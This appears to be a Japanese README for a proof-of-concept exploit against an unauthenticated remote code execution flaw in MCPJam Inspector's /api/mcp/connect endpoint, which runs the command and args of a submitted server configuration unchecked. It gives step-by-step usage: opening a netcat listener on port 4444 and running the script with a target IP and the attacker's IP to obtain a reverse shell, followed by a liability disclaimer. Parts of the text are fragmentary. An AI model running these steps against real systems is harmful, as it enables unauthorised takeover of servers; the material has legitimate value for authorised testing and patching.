
このユーティリティは、MCPJam v1.4.2 に関連する研究の中で作成されました。このアプリケーションは、サーバー構成オブジェクトを受け入れるAPIエンドポイントを公開しています。特定の条件下では、不十分な検証により、意図しないコマンドが実行される可能性があります。
MCPJam Inspectorには、/api/mcp/connect エンドポイントに認証不要のリモートコード実行(RCE)脆弱性があります。この脆弱性により、攻撃者は悪意のあるMCPサーバー設定ペイロードを送信することで任意のコマンドを実行できます。
このエンドポイントは、serverConfig オブジェクトを含むJSONペイロードを受け入れ、そのオブジェクトには command と args 配列が含まれており、適切な検証やサニタイズなしでシステム上で直接実行されます。
requests ライブラリ: pip install requestsnetcat または socat端末1 - リスナーを起動:
nc -lvnp 4444
端末2 - エクスプロイトを実行:
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
# Default (port 6274, callback port 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>
# Custom MCPJam port
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
# Custom listener port
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
/api/mcp/connect エンドポイントに送信します⚠️ 免責事項:
このエクスプロイトは教育および許可されたセキュリティテスト目的のみで提供されます。コンピュータシステムへの不正アクセスは違法です。ユーザーは以下の責任を単独で負います:
作者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。自己責任で使用してください。
/api/mcp/connect